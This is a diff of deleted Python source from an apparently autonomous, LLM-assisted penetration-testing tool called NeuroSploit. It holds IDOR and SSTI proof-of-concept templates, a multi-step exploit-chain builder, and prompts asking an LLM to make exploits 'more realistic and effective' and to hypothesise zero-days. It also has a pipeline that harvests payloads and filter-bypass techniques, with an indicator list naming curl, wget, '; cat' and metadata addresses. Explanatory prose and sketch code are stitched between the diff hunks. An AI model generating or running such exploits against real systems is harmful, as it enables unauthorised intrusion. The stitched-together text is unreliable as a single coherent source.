sizes = [responses[k]["length"] for k in data_ids]
if len(set(sizes)) > 1:
print("[VULNERABLE] IDOR - Different IDs return different data")
else:
print("[CHECK] Same data for all IDs - may be public data")
else:
print("[SAFE] No unauthorized data access detected")''',
},
"ssti": {
"python": '''import requests
url = "{url}"
param = "{param}"
# Template expression tests
tests = [
("{{{{7*7}}}}", "49"),
("${{7*7}}", "49"),
("<%=7*7%>", "49"),
("{payload}", "{expected}"),
]
for expr, expected in tests:
resp = requests.get(url, params={{param: expr}})
if expected in resp.text:
print(f"[VULNERABLE] SSTI - {{expr}} evaluated to {{expected}}")
print(f"Template engine detected in response")
break
else:
print("[SAFE] No template injection detected")''',
},
}
def __init__(self, poc_generator=None):
"""Initialize with optional base poc_generator for template fallback."""
self.base_generator = poc_generator
async def generate(self, finding, recon_data=None,
llm=None, budget=None,
waf_detected: bool = False) -> ExploitResult:
"""Generate a complete, context-aware exploit for a confirmed finding."""
vuln_type = getattr(finding, "vulnerability_type", "")
endpoint = getattr(finding, "affected_endpoint", "")
param = getattr(finding, "parameter", "")
payload = getattr(finding, "payload", "")
evidence = getattr(finding, "evidence", "")
result = ExploitResult(description=f"PoC for {vuln_type} on {endpoint}")
# 1. Get base template
template = self.POC_TEMPLATES.get(vuln_type, {})
# 2. Generate all formats
context = {
"url": endpoint,
"param": param or "PARAM",
"payload": payload,
"payload_encoded": quote(payload, safe=""),
"marker": self._extract_marker(payload, vuln_type),
"display_url": endpoint, # For stored XSS
"expected": self._get_expected_output(payload, vuln_type),
}
for fmt, tmpl in template.items():
try:
result.formats[fmt] = tmpl.format(**context)
except (KeyError, IndexError, ValueError):
result.formats[fmt] = tmpl
# 3. AI enhancement (if budget available)
if llm and budget and not budget.should_skip("enhancement"):
est_tokens = 1500
if budget.can_spend("enhancement", est_tokens):
enhanced = await self._ai_enhance_poc(
vuln_type, endpoint, param, payload, evidence,
result.formats.get("python", ""), llm
)
if enhanced:
result.formats["python"] = enhanced
result.ai_enhanced = True
budget.record("enhancement", est_tokens, f"poc_{vuln_type}")
result.token_cost = est_tokens
# 4. Select primary format
result.poc_code = result.formats.get("python",
result.formats.get("curl",
result.formats.get("html", "")))
# 5. Fallback to base generator
if not result.poc_code and self.base_generator:
result.poc_code = self.base_generator.generate(
vuln_type, endpoint, param, payload, evidence
)
# 6. Generate steps
result.steps = self._generate_steps(vuln_type, endpoint, param, payload)
return result
async def generate_zero_day_hypothesis(self, recon_data, findings: list,
llm, budget) -> List[ZeroDayHypothesis]:
"""AI reasoning about potential unknown vulnerabilities."""
if not llm or budget.should_skip("reasoning"):
return []
est_tokens = 3000
if not budget.can_spend("reasoning", est_tokens):
return []
findings_summary = []
for f in findings[:10]:
findings_summary.append({
"type": getattr(f, "vulnerability_type", ""),
"endpoint": getattr(f, "affected_endpoint", ""),
"param": getattr(f, "parameter", ""),
})
tech = getattr(recon_data, "technologies", []) if recon_data else []
endpoints = []
if recon_data:
for ep in getattr(recon_data, "endpoints", [])[:15]:
if isinstance(ep, dict):
endpoints.append(ep.get("url", ""))
elif isinstance(ep, str):
endpoints.append(ep)
prompt = f"""You are a senior security researcher analyzing a web application for potential zero-day vulnerabilities.
**Technology Stack:** {', '.join(tech[:10])}
**Known Endpoints:** {json.dumps(endpoints[:10])}
**Confirmed Vulnerabilities:** {json.dumps(findings_summary)}
Based on the technology stack, application behavior, and confirmed vulnerabilities, hypothesize about potential UNKNOWN vulnerabilities that standard scanners would miss.
Think about:
- Logic flaws in the application flow
- Race conditions in state-changing operations
- Deserialization issues in the detected framework
- Authentication/authorization edge cases
- Unusual parameter combinations that might trigger bugs
Respond in JSON:
{{
"hypotheses": [
{{
"hypothesis": "Description of the potential vulnerability",
"reasoning": "Why this might exist based on evidence",
"vuln_type": "closest_vuln_type",
"test_cases": [{{"method": "GET", "url": "/path", "params": {{"key": "value"}}}}],
"confidence": 0.3
}}
]
}}"""
try:
response = await llm.generate(prompt, "You are a senior security researcher.")
budget.record("reasoning", est_tokens, "zero_day_hypothesis")
match = re.search(r'\{.*\}', response, re.DOTALL)
if match:
data = json.loads(match.group())
hypotheses = []
for h in data.get("hypotheses", [])[:5]:
hypotheses.append(ZeroDayHypothesis(
hypothesis=h.get("hypothesis", ""),
reasoning=h.get("reasoning", ""),
test_cases=h.get("test_cases", []),
confidence=min(1.0, max(0.0, float(h.get("confidence", 0.2)))),
vuln_type=h.get("vuln_type", ""),
))
return hypotheses
except Exception:
pass
return []
async def generate_chained_exploit(self, chain: List, llm=None) -> str:
"""Generate exploit that chains multiple findings."""
if not chain:
return ""
steps = []
for i, finding in enumerate(chain, 1):
vtype = getattr(finding, "vulnerability_type", "unknown")
endpoint = getattr(finding, "affected_endpoint", "")
payload = getattr(finding, "payload", "")
steps.append(f"""# Step {i}: {vtype}
# Target: {endpoint}
# Payload: {payload}
print(f"[Step {i}] Exploiting {vtype} on {endpoint}")
resp_{i} = session.get("{endpoint}", params={{"{getattr(finding, 'parameter', 'param')}": "{payload}"}})
print(f" Status: {{resp_{i}.status_code}}")
""")
return f"""import requests
# Multi-Step Exploit Chain
# Steps: {' -> '.join(getattr(f, 'vulnerability_type', '?') for f in chain)}
session = requests.Session()
{''.join(steps)}
print("[CHAIN COMPLETE] All steps executed")
"""
def format_poc(self, exploit: ExploitResult, fmt: str) -> str:
"""Get PoC in specific format."""
return exploit.formats.get(fmt, exploit.poc_code)
# ── Internal Helpers ──
async def _ai_enhance_poc(self, vuln_type: str, endpoint: str,
param: str, payload: str, evidence: str,
base_poc: str, llm) -> Optional[str]:
"""Use AI to enhance the base PoC."""
prompt = f"""Improve this PoC script to be more realistic and effective.
Vulnerability: {vuln_type}
Endpoint: {endpoint}
Parameter: {param}
Evidence: {evidence[:300]}
Current PoC:
```python
{base_poc[:1000]}
```
Requirements:
1. Add proper error handling
2. Add clear success/failure output
3. Include verification step
4. Keep it concise (max 40 lines)
Return ONLY the improved Python code, no explanation."""
try:
response = await llm.generate(prompt, "You are a security engineer writing PoC code.")
# Extract code block
code_match = re.search(r'```python\n(.*?)```', response, re.DOTALL)
if code_match:
return code_match.group(1).strip()
# If no code block, check if response looks like code
if "import " in response and "requests" in response:
return response.strip()
except Exception:
pass
return None
def _extract_marker(self, payload: str, vuln_type: str) -> str:
"""Extract a marker string from payload for grep verification."""
if "alert" in payload:
return "alert"
if "script" in payload.lower():
return "script"
return payload[:20] if payload else vuln_type
def _get_expected_output(self, payload: str, vuln_type: str) -> str:
"""Get expected output for template expression evaluation."""
if "7*7" in payload:
return "49"
if "7*8" in payload:
return "56"
return ""
def _generate_steps(self, vuln_type: str, endpoint: str,
param: str, payload: str) -> List[str]:
"""Generate human-readable exploitation steps."""
return [
f"1. Navigate to {endpoint}",
f"2. Inject payload into '{param}' parameter: {payload[:80]}",
f"3. Observe response for {vuln_type} indicators",
f"4. Verify exploitation impact",
]
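The PoC templates in this file are rendered with `str.format`, so literal braces in the generated script are doubled (`{{` / `}}`) while single-brace names such as `{url}` are substituted from the context dict. A minimal sketch of that rendering step follows. The `render_poc` helper, the `TEMPLATE` string, and the example URL are assumptions made for illustration and are not part of the removed module.

```python
from urllib.parse import quote

# Hypothetical template in the same style as POC_TEMPLATES: single braces are
# substituted by str.format, doubled braces survive as literal braces.
TEMPLATE = '''import requests
resp = requests.get("{url}", params={{"{param}": "{payload}"}})
print(f"status={{resp.status_code}}")'''


def render_poc(template: str, context: dict) -> str:
    """Render a template, returning it unrendered if formatting fails."""
    try:
        return template.format(**context)
    except (KeyError, IndexError, ValueError):
        # Same fallback idea as generate(): keep the raw template text.
        return template


# Illustrative context; unused keys (payload_encoded) are simply ignored.
context = {
    "url": "http://example.test/item",
    "param": "id",
    "payload": "1",
    "payload_encoded": quote("1", safe=""),
}
rendered = render_poc(TEMPLATE, context)
print(rendered)
```

Note that context values are pasted into the script verbatim, so a payload containing a double quote would yield a generated script that does not parse. Escaping the values (for example with `repr`) before formatting is one way to avoid that.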
@@ -1,444 +0,0 @@
"""
NeuroSploit v3 - Knowledge Processor
Pipeline: Upload -> Extract Text -> AI Summarize -> Index by Vuln Type -> Store.
Processes bug bounty papers, CVE documents, writeups, and lab reports
into structured knowledge the agent uses during testing.
"""
import json
import re
import uuid
import shutil
from pathlib import Path
from datetime import datetime
from typing import List, Dict, Optional, Any
import logging
logger = logging.getLogger(__name__)
# Optional PDF support
try:
from PyPDF2 import PdfReader
HAS_PYPDF2 = True
except ImportError:
HAS_PYPDF2 = False
KNOWLEDGE_DIR = Path("data/custom-knowledge")
UPLOADS_DIR = KNOWLEDGE_DIR / "uploads"
INDEX_FILE = KNOWLEDGE_DIR / "index.json"
SUPPORTED_FORMATS = {".pdf", ".md", ".txt", ".html", ".htm"}
# Standard vuln type keywords for classification
VULN_KEYWORDS = {
"xss": ["xss", "cross-site scripting", "cross site scripting", "script injection", "reflected xss", "stored xss", "dom xss"],
"sqli": ["sql injection", "sqli", "sql inject", "union select", "blind sql", "boolean-based", "time-based"],
"ssrf": ["ssrf", "server-side request forgery", "server side request forgery", "internal request"],
"idor": ["idor", "insecure direct object reference", "direct object reference", "horizontal privilege"],
"rce": ["rce", "remote code execution", "command injection", "os command", "code execution"],
"lfi": ["lfi", "local file inclusion", "file inclusion", "path traversal", "directory traversal"],
"rfi": ["rfi", "remote file inclusion"],
"csrf": ["csrf", "cross-site request forgery", "cross site request forgery"],
"xxe": ["xxe", "xml external entity", "xml injection"],
"ssti": ["ssti", "server-side template injection", "template injection"],
"auth_bypass": ["auth bypass", "authentication bypass", "login bypass", "2fa bypass", "mfa bypass"],
"open_redirect": ["open redirect", "url redirect", "redirect vulnerability"],
"race_condition": ["race condition", "toctou", "time of check"],
"deserialization": ["deserialization", "deserialize", "insecure deserialization", "pickle", "java serialization"],
"graphql": ["graphql", "graphql injection", "introspection"],
"nosql": ["nosql", "nosql injection", "mongodb injection"],
"jwt": ["jwt", "json web token", "jwt attack", "jwt bypass"],
"cors": ["cors", "cross-origin", "access-control-allow-origin"],
"crlf": ["crlf", "crlf injection", "header injection"],
"upload": ["file upload", "upload bypass", "unrestricted upload", "webshell"],
"subdomain_takeover": ["subdomain takeover", "dangling dns"],
"information_disclosure": ["information disclosure", "info leak", "data exposure", "sensitive data"],
"privilege_escalation": ["privilege escalation", "privesc", "vertical privilege"],
"bola": ["bola", "broken object level authorization"],
"bfla": ["bfla", "broken function level authorization"],
"api": ["api security", "api vulnerability", "rest api", "api abuse"],
"websocket": ["websocket", "ws hijacking"],
"cache_poisoning": ["cache poisoning", "web cache"],
"prototype_pollution": ["prototype pollution", "__proto__"],
"clickjacking": ["clickjacking", "ui redressing", "x-frame-options"],
}
AI_ANALYSIS_PROMPT = """You are a security research analyst. Analyze the following security document and extract structured knowledge for a penetration testing AI agent.
Document filename: {filename}
Document content (truncated):
{text}
Extract the following as JSON:
{{
"title": "Short descriptive title for this document",
"summary": "2-3 sentence summary of the key security findings/methodology",
"vuln_types": ["list", "of", "vuln_types"],
"knowledge_entries": [
{{
"vuln_type": "the_vuln_type",
"methodology": "Step-by-step attack methodology described in the document",
"payloads": ["specific payloads or PoC code mentioned"],
"key_insights": "What makes this approach unique or effective",
"bypass_techniques": ["any WAF/filter/defense bypasses described"]
}}
]
}}
RULES:
- vuln_types must use standard identifiers: xss, sqli, ssrf, idor, rce, lfi, csrf, xxe, ssti, auth_bypass, open_redirect, race_condition, deserialization, graphql, nosql, jwt, cors, crlf, upload, subdomain_takeover, information_disclosure, privilege_escalation, bola, bfla, api, websocket, cache_poisoning, prototype_pollution, clickjacking
- Only extract information EXPLICITLY present in the document
- Do NOT fabricate payloads or methodologies not described in the text
- Each knowledge_entry should map to exactly one vuln_type
- If the document covers multiple vuln types, create separate entries for each
"""
class KnowledgeProcessor:
"""Processes uploaded security documents into indexed knowledge."""
def __init__(self, llm_client=None):
self.llm_client = llm_client
self._index = self._load_index()
KNOWLEDGE_DIR.mkdir(parents=True, exist_ok=True)
UPLOADS_DIR.mkdir(parents=True, exist_ok=True)
def _load_index(self) -> dict:
"""Load or initialize the knowledge index."""
if INDEX_FILE.exists():
try:
return json.loads(INDEX_FILE.read_text())
except Exception as e:
logger.warning(f"Failed to load knowledge index: {e}")
return {"documents": [], "vuln_type_index": {}, "version": "1.0"}
def _save_index(self):
"""Persist index to disk."""
self._index["updated_at"] = datetime.utcnow().isoformat()
INDEX_FILE.write_text(json.dumps(self._index, indent=2))
async def process_upload(self, file_bytes: bytes, filename: str) -> dict:
"""Full pipeline for a single file upload."""
ext = Path(filename).suffix.lower()
if ext not in SUPPORTED_FORMATS:
raise ValueError(f"Unsupported format: {ext}. Supported: {', '.join(sorted(SUPPORTED_FORMATS))}")
# Generate unique ID
doc_id = str(uuid.uuid4())[:12]
# Save raw file
safe_filename = re.sub(r'[^a-zA-Z0-9._-]', '_', filename)
file_path = UPLOADS_DIR / f"{doc_id}_{safe_filename}"
file_path.write_bytes(file_bytes)
# Extract text
text = self._extract_text(file_path, ext)
if not text or len(text.strip()) < 50:
file_path.unlink(missing_ok=True)
raise ValueError("Document has insufficient text content (< 50 chars)")
# AI analysis (or keyword-based fallback)
if self.llm_client:
analysis = await self._ai_analyze(text, filename)
else:
analysis = self._keyword_analyze(text, filename)
# Build document entry
doc_entry = {
"id": doc_id,
"filename": filename,
"title": analysis.get("title", filename),
"source_type": ext.lstrip("."),
"uploaded_at": datetime.utcnow().isoformat(),
"processed": True,
"file_size_bytes": len(file_bytes),
"summary": analysis.get("summary", ""),
"vuln_types": analysis.get("vuln_types", []),
"knowledge_entries": analysis.get("knowledge_entries", []),
}
# Add to index
self._index_document(doc_entry)
self._save_index()
logger.info(f"Processed knowledge document: {filename} -> {len(doc_entry['knowledge_entries'])} entries")
return doc_entry
def _extract_text(self, file_path: Path, ext: str) -> str:
"""Extract text from file based on format."""
if ext == ".pdf":
return self._extract_text_pdf(file_path)
elif ext in (".md", ".txt"):
return self._extract_text_plaintext(file_path)
elif ext in (".html", ".htm"):
return self._extract_text_html(file_path)
return ""
def _extract_text_pdf(self, file_path: Path) -> str:
"""Extract text from PDF."""
if not HAS_PYPDF2:
logger.warning("PyPDF2 not installed - PDF extraction unavailable. Install: pip install PyPDF2")
# Try reading as text fallback
try:
return file_path.read_text(errors="ignore")[:20000]
except Exception:
return ""
try:
reader = PdfReader(str(file_path))
text_parts = []
for page in reader.pages[:50]: # Max 50 pages
page_text = page.extract_text()
if page_text:
text_parts.append(page_text)
return "\n\n".join(text_parts)
except Exception as e:
logger.warning(f"PDF extraction failed: {e}")
return ""
def _extract_text_plaintext(self, file_path: Path) -> str:
"""Read markdown or plain text file."""
try:
return file_path.read_text(errors="ignore")
except Exception:
return ""
def _extract_text_html(self, file_path: Path) -> str:
"""Extract text from HTML by stripping tags."""
try:
html = file_path.read_text(errors="ignore")
# Remove script and style blocks
html = re.sub(r'<script[^>]*>.*?</script>', '', html, flags=re.DOTALL | re.IGNORECASE)
html = re.sub(r'<style[^>]*>.*?</style>', '', html, flags=re.DOTALL | re.IGNORECASE)
# Strip all tags
text = re.sub(r'<[^>]+>', ' ', html)
# Clean whitespace
text = re.sub(r'\s+', ' ', text).strip()
return text
except Exception:
return ""
async def _ai_analyze(self, text: str, filename: str) -> dict:
"""Use LLM to extract structured knowledge."""
truncated = text[:8000]
prompt = AI_ANALYSIS_PROMPT.format(filename=filename, text=truncated)
try:
response = await self.llm_client.generate(prompt)
# Parse JSON from response
match = re.search(r'\{.*\}', response, re.DOTALL)
if match:
data = json.loads(match.group())
# Validate vuln_types
valid_types = set(VULN_KEYWORDS.keys())
data["vuln_types"] = [vt for vt in data.get("vuln_types", []) if vt in valid_types]
for entry in data.get("knowledge_entries", []):
if entry.get("vuln_type") not in valid_types:
entry["vuln_type"] = data["vuln_types"][0] if data["vuln_types"] else "information_disclosure"
return data
except Exception as e:
logger.warning(f"AI analysis failed, falling back to keyword analysis: {e}")
return self._keyword_analyze(text, filename)
def _keyword_analyze(self, text: str, filename: str) -> dict:
"""Fallback keyword-based analysis when no LLM available."""
text_lower = text.lower()
detected_types = []
for vuln_type, keywords in VULN_KEYWORDS.items():
for keyword in keywords:
if keyword in text_lower:
detected_types.append(vuln_type)
break
if not detected_types:
detected_types = ["information_disclosure"]
# Extract title from first line or filename
first_line = text.strip().split("\n")[0][:200]
title = first_line if len(first_line) > 10 else filename
# Build basic entries
entries = []
for vt in detected_types[:5]: # Max 5 types
entries.append({
"vuln_type": vt,
"methodology": self._extract_section(text, ["methodology", "steps", "approach", "technique"]),
"payloads": self._extract_payloads(text),
"key_insights": self._extract_section(text, ["insight", "key finding", "conclusion", "takeaway"]),
"bypass_techniques": self._extract_payloads_by_pattern(text, ["bypass", "evasion", "waf", "filter"]),
})
return {
"title": title.strip("#").strip(),
"summary": text[:300].strip(),
"vuln_types": detected_types,
"knowledge_entries": entries,
}
def _extract_section(self, text: str, keywords: List[str]) -> str:
"""Extract text section near keywords."""
text_lower = text.lower()
for keyword in keywords:
idx = text_lower.find(keyword)
if idx >= 0:
# Get surrounding context (up to 800 chars after keyword)
start = max(0, idx - 50)
end = min(len(text), idx + 800)
return text[start:end].strip()
return ""
def _extract_payloads(self, text: str) -> List[str]:
"""Extract potential payloads from text."""
payloads = []
# Look for common payload patterns
patterns = [
r'`([^`]{5,200})`', # Backtick-enclosed code
r"'([^']{10,200})'", # Single-quoted strings that look like payloads
]
for pattern in patterns:
matches = re.findall(pattern, text)
for m in matches:
if any(indicator in m.lower() for indicator in
["<script", "alert(", "onerror", "union select", "../", "{{",
"curl ", "wget ", "%00", "127.0.0.1", "169.254", "; cat",
"' or ", '" or ', "1=1", "exec(", "system("]):
payloads.append(m)
return payloads[:20] # Max 20 payloads
def _extract_payloads_by_pattern(self, text: str, keywords: List[str]) -> List[str]:
"""Extract text fragments near specific keywords."""
results = []
text_lower = text.lower()
for keyword in keywords:
idx = text_lower.find(keyword)
if idx >= 0:
start = max(0, idx - 20)
end = min(len(text), idx + 200)
fragment = text[start:end].strip()
if fragment:
results.append(fragment[:200])
return results[:10]
def _index_document(self, doc_entry: dict):
"""Add document to the index."""
# Remove existing doc with same ID if re-processing
self._index["documents"] = [
d for d in self._index["documents"] if d["id"] != doc_entry["id"]
]
self._index["documents"].append(doc_entry)
# Update vuln_type_index
for vt in doc_entry.get("vuln_types", []):
if vt not in self._index["vuln_type_index"]:
self._index["vuln_type_index"][vt] = []
if doc_entry["id"] not in self._index["vuln_type_index"][vt]:
self._index["vuln_type_index"][vt].append(doc_entry["id"])
def get_documents(self) -> List[dict]:
"""Return all indexed documents (without full entries for list view)."""
docs = []
for d in self._index.get("documents", []):
docs.append({
"id": d["id"],
"filename": d["filename"],
"title": d["title"],
"source_type": d["source_type"],
"uploaded_at": d["uploaded_at"],
"processed": d["processed"],
"file_size_bytes": d["file_size_bytes"],
"summary": d["summary"],
"vuln_types": d["vuln_types"],
"entries_count": len(d.get("knowledge_entries", [])),
})
return docs
def get_document(self, doc_id: str) -> Optional[dict]:
"""Get a specific document with full entries."""
for d in self._index.get("documents", []):
if d["id"] == doc_id:
return d
return None
def delete_document(self, doc_id: str) -> bool:
"""Remove document from index and delete uploaded file."""
doc = self.get_document(doc_id)
if not doc:
return False
# Remove from documents list
self._index["documents"] = [
d for d in self._index["documents"] if d["id"] != doc_id
]
# Remove from vuln_type_index
for vt, doc_ids in self._index.get("vuln_type_index", {}).items():
if doc_id in doc_ids:
doc_ids.remove(doc_id)
# Delete uploaded file
for f in UPLOADS_DIR.glob(f"{doc_id}_*"):
f.unlink(missing_ok=True)
self._save_index()
return True
def search_by_vuln_type(self, vuln_type: str, max_entries: int = 5) -> List[dict]:
"""Search knowledge entries by vulnerability type."""
vuln_key = vuln_type.lower().replace(" ", "_").replace("-", "_")
doc_ids = self._index.get("vuln_type_index", {}).get(vuln_key, [])
if not doc_ids:
return []
entries = []
for doc in self._index.get("documents", []):
if doc["id"] in doc_ids:
for ke in doc.get("knowledge_entries", []):
if ke.get("vuln_type") == vuln_key:
entry = dict(ke)
entry["source_document"] = doc["title"]
entry["source_id"] = doc["id"]
entries.append(entry)
return entries[:max_entries]
def get_stats(self) -> dict:
"""Get knowledge base statistics."""
docs = self._index.get("documents", [])
total_entries = sum(len(d.get("knowledge_entries", [])) for d in docs)
vuln_types = list(self._index.get("vuln_type_index", {}).keys())
# Calculate storage size
storage_bytes = 0
if UPLOADS_DIR.exists():
for f in UPLOADS_DIR.iterdir():
storage_bytes += f.stat().st_size
return {
"total_documents": len(docs),
"total_entries": total_entries,
"vuln_types_covered": sorted(vuln_types),
"storage_bytes": storage_bytes,
}
def get_patterns_for_vuln(self, vuln_type: str, max_entries: int = 3) -> str:
"""Get formatted knowledge patterns for a vuln type (for LLM context injection)."""
entries = self.search_by_vuln_type(vuln_type, max_entries)
if not entries:
return ""
result = "\n\n=== CUSTOM KNOWLEDGE (User-Uploaded Research) ===\n"
for i, entry in enumerate(entries, 1):
result += f"--- Research {i}: {entry.get('source_document', 'Unknown')} ---\n"
if entry.get("methodology"):
result += f"Methodology: {entry['methodology'][:800]}\n"
if entry.get("payloads"):
result += f"Payloads: {', '.join(entry['payloads'][:5])}\n"
if entry.get("key_insights"):
result += f"Key Insights: {entry['key_insights'][:400]}\n"
if entry.get("bypass_techniques"):
result += f"Bypass Techniques: {', '.join(entry['bypass_techniques'][:3])}\n"
result += "\n"
result += "=== END CUSTOM KNOWLEDGE ===\n"
return result
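The keyword fallback and the `vuln_type_index` in the knowledge processor amount to substring classification followed by an inverted index from vuln type to document IDs. A minimal sketch of that idea is below. The reduced `KEYWORDS` table, the `classify` and `build_type_index` helpers, and the sample documents are assumptions for illustration, not the removed module's API.

```python
from typing import Dict, List

# Small, illustrative subset of a keyword table (not the full VULN_KEYWORDS).
KEYWORDS: Dict[str, List[str]] = {
    "xss": ["xss", "cross-site scripting"],
    "sqli": ["sql injection", "union select"],
    "ssrf": ["ssrf", "server-side request forgery"],
}


def classify(text: str, default: str = "information_disclosure") -> List[str]:
    """Return every vuln type with at least one keyword present in the text."""
    lowered = text.lower()
    found = [
        vuln_type
        for vuln_type, words in KEYWORDS.items()
        if any(word in lowered for word in words)
    ]
    # Fall back to a generic type when nothing matches.
    return found or [default]


def build_type_index(docs: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each vuln type to the IDs of the documents that mention it."""
    index: Dict[str, List[str]] = {}
    for doc_id, text in docs.items():
        for vuln_type in classify(text):
            index.setdefault(vuln_type, []).append(doc_id)
    return index


# Made-up documents keyed by a short ID.
docs = {
    "a1": "Writeup: reflected XSS via the search box.",
    "b2": "Blind SQL injection with UNION SELECT, then SSRF to metadata.",
    "c3": "Notes on verbose error pages.",
}
index = build_type_index(docs)
print(index)
```

Plain substring matching is cheap but can over-match short keywords inside unrelated words. A word-boundary regular expression would be a stricter alternative if false positives matter.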
File diff suppressed because it is too large
@@ -1,552 +0,0 @@
"""
Methodology Loader - Parses external pentest methodology .md files and indexes them
for smart injection into all LLM call sites in the autonomous agent.
Supports FASE-based methodology documents (like pentestcompleto.md) as well as
generic markdown documents. Maps sections to vulnerability types and agent contexts
for targeted injection with per-context character budgets.
"""
import logging
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
logger = logging.getLogger(__name__)
# ─── FASE → Vulnerability Type Mapping ───────────────────────────────────────
# Maps each FASE section to the agent's vulnerability type identifiers.
# These match the 100 types in vuln_engine/registry.py.
FASE_VULN_TYPE_MAP: Dict[str, List[str]] = {
"fase_0": [], # Recon - broad, no specific vuln types
"fase_1": [], # Architecture analysis - broad strategy
"fase_2": [
"jwt_manipulation", "session_fixation", "broken_auth", "auth_bypass",
"insecure_password_reset", "account_takeover", "cookie_manipulation",
"captcha_bypass", "session_hijacking",
],
"fase_3": [
"idor", "bola", "bfla", "privilege_escalation", "forced_browsing",
"auth_bypass", "mass_assignment",
],
"fase_4": [
"race_condition", "business_logic", "workflow_bypass",
"payment_manipulation", "insufficient_anti_automation",
],
"fase_5": [], # CVE/Zero-day - applies to all types via strategy context
"fase_6": [
"ssrf", "cloud_misconfig", "s3_bucket_misconfiguration",
"cloud_metadata_exposure", "serverless_misconfiguration",
"kubernetes_misconfig", "iam_misconfig",
],
"fase_7": [], # OWASP WSTG reference - strategy context
"fase_8": [
"bola", "bfla", "mass_assignment", "excessive_data_exposure",
"api_abuse", "api_rate_limiting", "rest_api_versioning",
"broken_auth", "ssrf",
],
"fase_9": [
"graphql_injection", "graphql_introspection", "graphql_dos",
"websocket_security", "grpc_security",
],
"fase_10": [
"sqli_error", "sqli_union", "sqli_blind", "sqli_time", "sqli_oob",
"nosql_injection", "ssti", "ldap_injection", "xpath_injection",
"crlf_injection", "header_injection", "parameter_pollution",
"command_injection", "email_injection", "expression_language_injection",
"log_injection", "orm_injection", "ssi_injection", "xslt_injection",
"csv_injection",
],
"fase_11": [
"xss_reflected", "xss_stored", "xss_dom", "cors_misconfig",
"csp_bypass", "clickjacking", "open_redirect", "prototype_pollution",
"html_injection", "css_injection", "dom_clobbering", "postmessage_abuse",
"dangling_markup",
],
"fase_12": [
"http_request_smuggling", "cache_poisoning", "cache_deception",
"http2_smuggling", "connection_pool_poisoning", "http_method_tampering",
],
"fase_13": [
"file_upload", "lfi", "rfi", "path_traversal", "zip_slip",
],
"fase_14": [
"ssrf", "dns_rebinding", "blind_ssrf",
],
"fase_15": [
"broken_auth", "insecure_password_reset", "brute_force",
"account_enumeration", "captcha_bypass", "session_fixation",
"account_takeover", "mfa_bypass",
],
"fase_16": [
"mass_assignment", "rate_limit_bypass", "api_rate_limiting",
"brute_force",
],
"fase_17": [
"information_disclosure", "subdomain_takeover", "directory_listing",
"default_credentials", "security_headers", "ssl_tls",
"debug_endpoints", "backup_files", "source_code_exposure",
"sensitive_data_exposure",
],
"fase_18": [
"insecure_deserialization",
],
"fase_19": [
"denial_of_service", "graphql_dos", "redos", "xml_bomb",
],
"fase_20": [
"xxe",
],
}
# ─── FASE → Agent Context Mapping ────────────────────────────────────────────
# Maps each FASE to the agent contexts where it should be injected.
FASE_CONTEXT_MAP: Dict[str, List[str]] = {
"fase_0": ["strategy"],
"fase_1": ["strategy"],
"fase_2": ["testing", "verification", "confirmation"],
"fase_3": ["testing", "verification", "confirmation"],
"fase_4": ["testing", "confirmation", "strategy"],
"fase_5": ["strategy", "testing"],
"fase_6": ["testing", "verification"],
"fase_7": ["strategy"],
"fase_8": ["testing", "verification", "confirmation"],
"fase_9": ["testing", "verification"],
"fase_10": ["testing", "verification", "confirmation"],
"fase_11": ["testing", "verification", "confirmation"],
"fase_12": ["testing", "verification"],
"fase_13": ["testing", "verification", "confirmation"],
"fase_14": ["testing", "verification"],
"fase_15": ["testing", "verification", "confirmation"],
"fase_16": ["testing", "confirmation"],
"fase_17": ["testing", "reporting"],
"fase_18": ["testing", "verification", "confirmation"],
"fase_19": ["testing"],
"fase_20": ["testing", "verification", "confirmation"],
}
# ─── Keyword → Vuln Type Mapping (for non-FASE documents) ───────────────────
KEYWORD_VULN_MAP: Dict[str, List[str]] = {
"sql injection": ["sqli_error", "sqli_union", "sqli_blind", "sqli_time"],
"xss": ["xss_reflected", "xss_stored", "xss_dom"],
"cross-site scripting": ["xss_reflected", "xss_stored", "xss_dom"],
"ssrf": ["ssrf", "blind_ssrf"],
"server-side request forgery": ["ssrf", "blind_ssrf"],
"xxe": ["xxe"],
"xml external entity": ["xxe"],
"ssti": ["ssti"],
"template injection": ["ssti"],
"idor": ["idor", "bola"],
"broken access": ["bola", "bfla", "idor"],
"deserialization": ["insecure_deserialization"],
"file upload": ["file_upload"],
"lfi": ["lfi", "path_traversal"],
"local file inclusion": ["lfi", "path_traversal"],
"rfi": ["rfi"],
"remote file inclusion": ["rfi"],
"command injection": ["command_injection"],
"cors": ["cors_misconfig"],
"csrf": ["csrf"],
"clickjacking": ["clickjacking"],
"open redirect": ["open_redirect"],
"jwt": ["jwt_manipulation"],
"oauth": ["broken_auth", "auth_bypass"],
"race condition": ["race_condition"],
"prototype pollution": ["prototype_pollution"],
"request smuggling": ["http_request_smuggling"],
"cache poisoning": ["cache_poisoning"],
"graphql": ["graphql_injection", "graphql_introspection", "graphql_dos"],
"websocket": ["websocket_security"],
"nosql": ["nosql_injection"],
"ldap": ["ldap_injection"],
"crlf": ["crlf_injection"],
"mass assignment": ["mass_assignment"],
"rate limit": ["rate_limit_bypass", "api_rate_limiting"],
}
@dataclass
class MethodologySection:
"""A parsed section from a methodology document."""
fase_id: str
title: str
content: str
sub_sections: Dict[str, str] = field(default_factory=dict)
vuln_types: List[str] = field(default_factory=list)
contexts: List[str] = field(default_factory=list)
@property
def char_count(self) -> int:
return len(self.content)
class MethodologyIndex:
"""Indexed methodology for fast retrieval by vuln_type and context."""
def __init__(self):
self.sections: Dict[str, MethodologySection] = {}
self.vuln_type_index: Dict[str, List[str]] = {} # vuln_type → [fase_ids]
self.context_index: Dict[str, List[str]] = {} # context → [fase_ids]
def add_section(self, section: MethodologySection) -> None:
self.sections[section.fase_id] = section
for vt in section.vuln_types:
self.vuln_type_index.setdefault(vt, []).append(section.fase_id)
for ctx in section.contexts:
self.context_index.setdefault(ctx, []).append(section.fase_id)
def get_for_vuln_and_context(
self,
vuln_type: str,
context: str,
max_chars: int = 2000,
) -> str:
"""Get methodology text relevant to both vuln_type and context.
Prefers sub-sections that mention the vuln_type for precision.
Truncates to max_chars budget.
"""
if not self.sections:
return ""
candidate_fase_ids: set = set()
# Find FASEs matching vuln_type
if vuln_type:
# Direct match
for fid in self.vuln_type_index.get(vuln_type, []):
candidate_fase_ids.add(fid)
# Fuzzy match: try without common suffixes
base_vt = vuln_type.replace("_reflected", "").replace("_stored", "").replace("_dom", "")
